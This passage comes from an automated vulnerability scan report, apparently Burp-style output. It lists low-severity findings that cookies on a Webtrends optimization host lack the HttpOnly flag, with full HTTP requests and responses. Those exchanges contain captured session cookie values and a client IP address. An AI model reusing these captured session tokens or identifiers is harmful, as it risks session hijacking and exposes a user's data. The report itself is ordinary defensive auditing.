6dc918ffb4a9f17c06cdab90d79e589b5aa968ba091b9ff920254551b55e00459fc6f1d9987458df9cfe29e0185fa41759b68dc15bd0f741db3b14439310ebcb5b6cd685a7830ed9a2a91c653859cd8642eb09ac40219a1e342aabab7f91b0feafe6288912fb6630a1074fa747066dfee1c7450d28f14bd12e449440a9a267cd18dcab536b91de19a2256fa940c6aa08f40c900dc11f28f2301bfa3f8b1a9b7c309aa436865cec1adf3b38207c5c99e4caf1913c3d90e3ecdddf98a9dfacb2403e48b0cfcec2dd5e1447844f3c1785048c585326758451981aa0a7b3f558b5310856b26c2652342a96300d63602ea2eb717b933a244d3612423905c2c01ecbcaf0e528b35e7e8e23b16f15417969bcb2bf3202081f10ec2980e6c7af44dd1657cedc7013fe43c01c0ea871aac1509ea625fc8be26a0a4260e975f1a61c7e680d77cf963c4f46836e9da7a76ff497f0ac58da30f7140127057bdd91435f52005abdb319170e85e189415914ebb2e640855ce1154ad5cdbccae46e5d201fb84c982e587a3cfb0cb02dcb85fc9c006330a15d9c59cfc482f9806b6a5a324cb6c65d87185bf6aed015f99c902088ffe7cb245f26f1434e647b013c7847bc65f93be003801845666699759a7343910b11db26751e34ef00749054185cdddec557f040d3f21cf1b780aba02c5bab28aa89fa29d022335789a0041993670759e713402e85f340fcabedfe4cca51690a8a405794719783a8c7acc22c63e3e8484bcc947484fc1fc724f48b593a392f4de57e95adfd827db32e6d3647403ac24b4f4e4cd79f92ee6d6272dec1115b883f15b788dc78653481207f4da0fd8295a01022c8d127c3d0d323612a5484bb5eb11ada2e95fe17f5f04dc341a8a794f48202a633f294d0969f25ef9d08a125f8168389666eb419f58b0b8715fc38a7ec41b4e06811d8bc7647b77c469cf99632e065e639c8435c7db0f355db685b5feb01ecb7cd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097faad25255cec6b40eabb0a73969b9191a1b0b56e0819b7c5c17493824c1c009d8f47b361528f0865b488d231cbd11e21882470726c934d925a847ee70d6830875c82c9e230ae96c2766431d6937f93af6262220e119b3bee6ba16b4a63e47e58b7bf227bdaa0d4f48cae5d4a8899929800359cbb942ecfd786c6b3b7c9b9d6beab379bb9255c9a5fe8cf73e1c74d2403c82007f4ce8e7155fe448544219b56259b7734531e4331c25430aa00ccc6dc918ffb4a9f17c06cdab90d79e589b5aa968ba091b9ff920254551b55e00459fc6f1d9987458df9cfe29e0185fa41759b68dc15bd0f741db3b14439310ebcb5b6cd685a7830ed9a2a91c653859cd8642eb09ac40219a1e342aabab7f91b0feafe6288912fb6630a1074fa747066dfee1c7450d28f14bd12e449440a9a267cd18dcab536b91de19a2256fa940c6aa08f40c900dc11f28f2301bfa3f8b1a9b7c309aa436865cec1adf3b38207c5c99e4caf1913c3d90e3ecdddf98a9dfacb2403e48b0cfcec2dd5e1447844f3c1785048c585326758451981aa0a7b3f558b5310856b26c2652342a96300d63602ea2eb717b933a244d3612423905c2c01ecbcaf0e528b35e7e8e23b16f15417969bcb2bf3202081f10ec2980e6c7af44dd1657cedc7013fe43c01c0ea871aac1509ea625fc8be26a0a4260e975f1a61c7e680d77cf963c4f46836e9da7a76ff497f0ac58da30f7140127057bdd91435f52005abdb319170e85e189415914ebb2e640855ce1154ad5cdbccae46e5d201fb84c982e587a3cfb0cb02dcb85fc9c006330a15d9c59cfc482f9806b6a5a324cb6c65d87185bf6aed015f99c902088ffe7cb245f26f1434e647b013c7847bc65f93be003801845666699759a7343910b11db26751e34ef00749054185cdddec557f040d3f21cf1b780aba02c5bab28aa89fa29d022335789a0041993670759e713402e85f340fcabedfe4cca51690a8a405794719783a8c7acc22c63e3e8484bcc947484fc1fc724f48b593a392f4de57e95adfd827db32e6d3647403ac24b4f4e4cd79f92ee6d6272dec1115b883f15b788dc78653481207f4da0fd8295a01022c8d127c3d0d323612a5484bb5eb11ada2e95fe17f5f04dc341a8a794f48202a633f294d0969f25ef9d08a125f8168389666eb419f58b0b8715fc38a7ec41b4e06811d8bc7647b77c469cf99632e065e639c8435c7db0f355db685b5feb01ecb7cd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097faad25255cec6b40eabb0a73969b9191a1b0b56e0819b7c5c17493824c1c009d8f47b361528f0865b488d231cbd11e21882470726c934d925a847ee70d6830875c82c9e230ae96c2766431d6937f93af6262220e119b3bee6ba16b4a63e47e58b7bf227bdaa0d4f48cae5d4a8899929800359cbb942ecfd786c6b3b7c9b9d6beab379bb9255c9a5fe8cf73e1c74d2403c82007f4ce8e7155fe448544219b56259b7734531e4331c25430aa00ccc6dc918ffb4a9f17c06cdab90d79e589b5aa968ba091b9ff920254551b55e00459fc6f1d9987458df9cfe29e0185fa41759b68dc15bd0f741db3b14439310ebcb5b6cd685a7830ed9a2a91c653859cd8642eb09ac40219a1e342aabab7f91b0feafe6288912fb6630a1074fa747066dfee1c7450d28f14bd12e449440a9a267cd18dcab536b91de19a2256fa940c6aa08f40c900dc11f28f2301bfa3f8b1a9b7c309aa436865cec1adf3b38207c5c99e4caf1913c3d90e3ecdddf98a9dfacb2403e48b0cfcec2dd5e1447844f3c1785048c585326758451981aa0a7b3f558b5310856b26c2652342a96300d63602ea2eb717b933a244d3612423905c2c01ecbcaf0e528b35e7e8e23b16f15417969bcb2bf3202081f10ec2980e6c7af44dd1657cedc7013fe43c01c0ea871aac1509ea625fc8be26a0a4260e975f1a61c7e680d77cf963c4f46836e9da7a76ff497f0ac58da30f7140127057bdd91435f52005abdb319170e85e189415914ebb2e640855ce1154ad5cdbccae46e5d201fb84c982e587a3cfb0cb02dcb85fc9c006330a15d9c59cfc482f9806b6a5a324cb6c65d87185bf6aed015f99c902088ffe7cb245f26f1434e647b013c7847bc65f93be003801845666699759a7343910b11db26751e34ef00749054185cdddec557f040d3f21cf1b780aba02c5bab28aa89fa29d022335789a0041993670759e713402e85f340fcabedfe4cca51690a8a405794719783a8c7acc22c63e3e8484bcc947484fc1fc724f48b593a392f4de57e95adfd827db32e6d3647403ac24b4f4e4cd79f92ee6d6272dec1115b883f15b788dc78653481207f4da0fd8295a01022c8d127c3d0d323612a5484bb5eb11ada2e95fe17f5f04dc341a8a794f48202a633f294d0969f25ef9d08a125f8168389666eb419f58b0b8715fc38a7ec41b4e06811d8bc7647b77c469cf99632e065e639c8435c7db0f355db685b5feb01ecb7cd HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us/corporate-social-responsibility.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=436AD3879C2C3E6CD9AACE2057A0AD3B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; _wt.mode-79569=fcdcc722e93202d188d0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:05 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=93530B2177889BE5371E306CA55F4229; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.49. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d82504d813ae8f15cb47e034cff9831fb8a133e7bdf048e0529a29fdffb5fc507e1dd3d8224f0e7535247816ab7e2f3128e700fdaf677311b3bc03c8657a9892b68b7c936edb741a0703e3af0eb8e2f7769510c8d5688d58f19841a0fb443c9a37f184cf67d2d5f865902b6e97f0c62d150dc223387a7b4dd74dc50ebc4d007b9aa2db30b1075522b07f21aa49a62d2fd02d7b633a85ff89adac9b6f154ca2ede7288f351de7ddeb9b3f16a355edb81c0585f70898ca895aa2e049338708cd59e1c09515a8f11349b5c7eb78c6bd0b3060afdda24afa1ff5891ccd145c58445ad5b0528b0cc517a5de32ad9e64448451e83742d05d3d1af419a181c0d0ce8a4bd4abf8fb42f71901fe35b33672819331528c438f8bf1eec29865a379a739e9a41a8949f42cf47e07fea1573dea5ef78b66d84e27628451c6ce1534c404e2db34066a99d16d913ec2824d076b25853482578dc692e7eb0cab571b23e85f3ba9659f21842675cfe1f8b03dfad10b2eb250fa534e03a7ffb9a0c64777719b2929360bd43585b5887b09064e7d77a84066bb4a72e4cee5b950cc10aa786ce7e8c4deeafdfa43d52fa5106c3529e2ba7d6f5ef2265a17b4ea2b3ec190f8f6f2e75877beba742ebd7c0895fa47a1f03e78ac239aa93b8895698c112c5114fa8eaa7257e13442abfaf3323cc0f05a5224b7eaa494e37fdcf062c28741867e111f466cdf056867b6349b074432844bffd0a13cefc01c33436c4c7af66460b02cf60df7e139f815a7fc29453e99f5d9a3d648a226df3e31e81910dd1950506b7a0df6a3d3c16c4fe58db28d496bacb65a09449235004d8490d51ba17347b8de5c9e3cd01d2f3e49aba552de700136f3f  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d82504d813ae8f15cb47e034cff9831fb8a133e7bdf048e0529a29fdffb5fc507e1dd3d8224f0e7535247816ab7e2f3128e700fdaf677311b3bc03c8657a9892b68b7c936edb741a0703e3af0eb8e2f7769510c8d5688d58f19841a0fb443c9a37f184cf67d2d5f865902b6e97f0c62d150dc223387a7b4dd74dc50ebc4d007b9aa2db30b1075522b07f21aa49a62d2fd02d7b633a85ff89adac9b6f154ca2ede7288f351de7ddeb9b3f16a355edb81c0585f70898ca895aa2e049338708cd59e1c09515a8f11349b5c7eb78c6bd0b3060afdda24afa1ff5891ccd145c58445ad5b0528b0cc517a5de32ad9e64448451e83742d05d3d1af419a181c0d0ce8a4bd4abf8fb42f71901fe35b33672819331528c438f8bf1eec29865a379a739e9a41a8949f42cf47e07fea1573dea5ef78b66d84e27628451c6ce1534c404e2db34066a99d16d913ec2824d076b25853482578dc692e7eb0cab571b23e85f3ba9659f21842675cfe1f8b03dfad10b2eb250fa534e03a7ffb9a0c64777719b2929360bd43585b5887b09064e7d77a84066bb4a72e4cee5b950cc10aa786ce7e8c4deeafdfa43d52fa5106c3529e2ba7d6f5ef2265a17b4ea2b3ec190f8f6f2e75877beba742ebd7c0895fa47a1f03e78ac239aa93b8895698c112c5114fa8eaa7257e13442abfaf3323cc0f05a5224b7eaa494e37fdcf062c28741867e111f466cdf056867b6349b074432844bffd0a13cefc01c33436c4c7af66460b02cf60df7e139f815a7fc29453e99f5d9a3d648a226df3e31e81910dd1950506b7a0df6a3d3c16c4fe58db28d496bacb65a09449235004d8490d51ba17347b8de5c9e3cd01d2f3e49aba552de700136f3f

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d82504d813ae8f15cb47e034cff9831fb8a133e7bdf048e0529a29fdffb5fc507e1dd3d8224f0e7535247816ab7e2f3128e700fdaf677311b3bc03c8657a9892b68b7c936edb741a0703e3af0eb8e2f7769510c8d5688d58f19841a0fb443c9a37f184cf67d2d5f865902b6e97f0c62d150dc223387a7b4dd74dc50ebc4d007b9aa2db30b1075522b07f21aa49a62d2fd02d7b633a85ff89adac9b6f154ca2ede7288f351de7ddeb9b3f16a355edb81c0585f70898ca895aa2e049338708cd59e1c09515a8f11349b5c7eb78c6bd0b3060afdda24afa1ff5891ccd145c58445ad5b0528b0cc517a5de32ad9e64448451e83742d05d3d1af419a181c0d0ce8a4bd4abf8fb42f71901fe35b33672819331528c438f8bf1eec29865a379a739e9a41a8949f42cf47e07fea1573dea5ef78b66d84e27628451c6ce1534c404e2db34066a99d16d913ec2824d076b25853482578dc692e7eb0cab571b23e85f3ba9659f21842675cfe1f8b03dfad10b2eb250fa534e03a7ffb9a0c64777719b2929360bd43585b5887b09064e7d77a84066bb4a72e4cee5b950cc10aa786ce7e8c4deeafdfa43d52fa5106c3529e2ba7d6f5ef2265a17b4ea2b3ec190f8f6f2e75877beba742ebd7c0895fa47a1f03e78ac239aa93b8895698c112c5114fa8eaa7257e13442abfaf3323cc0f05a5224b7eaa494e37fdcf062c28741867e111f466cdf056867b6349b074432844bffd0a13cefc01c33436c4c7af66460b02cf60df7e139f815a7fc29453e99f5d9a3d648a226df3e31e81910dd1950506b7a0df6a3d3c16c4fe58db28d496bacb65a09449235004d8490d51ba17347b8de5c9e3cd01d2f3e49aba552de700136f3f HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=699E9E21874BEC698EE100FEE3749834; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e932047ca940; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=DD03FBD6C5716741DEF4FC9264E5B178; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; Expires=Sun, 01-Jan-2012 00:02:07 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=04434c6e; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202cf02d7; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.50. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d8250549d27fbe246b0270842ff9234ba8453226ac048925d62ae9ed1fc1bc215ad8c6bc117d7d7756872fb4785da9d30c46a0f86a17e684c65d73f9f46d4fc455f86a500cdc524c11f6833f2ee822f7e6d440f801681da9b1aa65d0ef464b4d43b582fa26e6d0e961744e2800c7c16ac21ab374598da85e052c149dbfeca05a8a805b308205e225f7a9766c3f667b8ba4180f674fa34a5dd9b97d9b10b9560d06ad9ab0e98038df8e4ae7e3b529ec7800e48729be3c7d0fc6f47c26b34cfbdca595b0840800073de1a35a49378b0d2607595a130bbb2a50d84d5ca23a2c907ee0b1423a5c8467254ea2dcfe255575072f2306a5986c6ac5a930e190d0cebbbbb4cb781b92e7e8616e64828704e7f7e5973892be0b10d915ad171058d25c9c252bc80805dce5ae07bee1b7fdfa4e16eb16199ee5c035d0b72f0535a40285bc02469b5ca589600aa302ac307f41f4c127f25807c2171abcda262a66997fdbd8648e706525d12b903d85f86bb00bfb0301ab023897426a18e2030341b5efbcbdc17f00e29490995e7e645e8c071c45763bff07d4cbd08c55b970aa2d69a2cdf4fbfa782a03e52f35203c604c02aa3d9fcef7967a72f1ffce2ea1d5f833c7824d52dbfac17e6d7c68a56a0291505b6dcce38f9c3bf8201c2cd44c61012f9eda3262e104529eefb332c9d5d53a2224c7cf8174f37fc9c077c78741c63ed45f76392a107872e324ab126432f4bedad5544cdac00973163999da663410d559c34d37d16c8825a24c79255bb9f5a9c3d3add2b39f9e11cdf9b08d4c20101b4a58f69693c139eac5cdb238495e8c369a1cf1c7a4211cd721814f21f6a798bfaceeacb01dce7b881fe4b34f9df974d2fa95bd1155b2cf138d981c4ce5f48a9f05e54ae283da7169509a69c7c0532e3ed3581b3d9f55aa3be902628708d95f59ddeb0b605aa711fc0e0c26d3c6a36749acd52b687c2858f2dd38372d724b42ba7699a42b300cd6ff37e859dc8977f5383a32900a155101c10def4af4e74f56bd89a6245fcc853d10ee0c09c2027d0f5af97bd51b7ce9b0b278631a5cadc8aa32b4fbc749ea6d0e2965d93432cc0ab1d68d7bc5c72fd11ede18cbbe0c07f4e0313b666e7c50092ede0601d16080ecf6c303cee3d9a3bc0f723c65d31c8e52458d23f7b439bb80af0e822edfe3ab3de1b40d5c39329eba1ba206e4ed966cc78f309399465fcc747f0d7b19e83bf55f153f6dc5fbb120019a0c2  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d8250549d27fbe246b0270842ff9234ba8453226ac048925d62ae9ed1fc1bc215ad8c6bc117d7d7756872fb4785da9d30c46a0f86a17e684c65d73f9f46d4fc455f86a500cdc524c11f6833f2ee822f7e6d440f801681da9b1aa65d0ef464b4d43b582fa26e6d0e961744e2800c7c16ac21ab374598da85e052c149dbfeca05a8a805b308205e225f7a9766c3f667b8ba4180f674fa34a5dd9b97d9b10b9560d06ad9ab0e98038df8e4ae7e3b529ec7800e48729be3c7d0fc6f47c26b34cfbdca595b0840800073de1a35a49378b0d2607595a130bbb2a50d84d5ca23a2c907ee0b1423a5c8467254ea2dcfe255575072f2306a5986c6ac5a930e190d0cebbbbb4cb781b92e7e8616e64828704e7f7e5973892be0b10d915ad171058d25c9c252bc80805dce5ae07bee1b7fdfa4e16eb16199ee5c035d0b72f0535a40285bc02469b5ca589600aa302ac307f41f4c127f25807c2171abcda262a66997fdbd8648e706525d12b903d85f86bb00bfb0301ab023897426a18e2030341b5efbcbdc17f00e29490995e7e645e8c071c45763bff07d4cbd08c55b970aa2d69a2cdf4fbfa782a03e52f35203c604c02aa3d9fcef7967a72f1ffce2ea1d5f833c7824d52dbfac17e6d7c68a56a0291505b6dcce38f9c3bf8201c2cd44c61012f9eda3262e104529eefb332c9d5d53a2224c7cf8174f37fc9c077c78741c63ed45f76392a107872e324ab126432f4bedad5544cdac00973163999da663410d559c34d37d16c8825a24c79255bb9f5a9c3d3add2b39f9e11cdf9b08d4c20101b4a58f69693c139eac5cdb238495e8c369a1cf1c7a4211cd721814f21f6a798bfaceeacb01dce7b881fe4b34f9df974d2fa95bd1155b2cf138d981c4ce5f48a9f05e54ae283da7169509a69c7c0532e3ed3581b3d9f55aa3be902628708d95f59ddeb0b605aa711fc0e0c26d3c6a36749acd52b687c2858f2dd38372d724b42ba7699a42b300cd6ff37e859dc8977f5383a32900a155101c10def4af4e74f56bd89a6245fcc853d10ee0c09c2027d0f5af97bd51b7ce9b0b278631a5cadc8aa32b4fbc749ea6d0e2965d93432cc0ab1d68d7bc5c72fd11ede18cbbe0c07f4e0313b666e7c50092ede0601d16080ecf6c303cee3d9a3bc0f723c65d31c8e52458d23f7b439bb80af0e822edfe3ab3de1b40d5c39329eba1ba206e4ed966cc78f309399465fcc747f0d7b19e83bf55f153f6dc5fbb120019a0c2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET 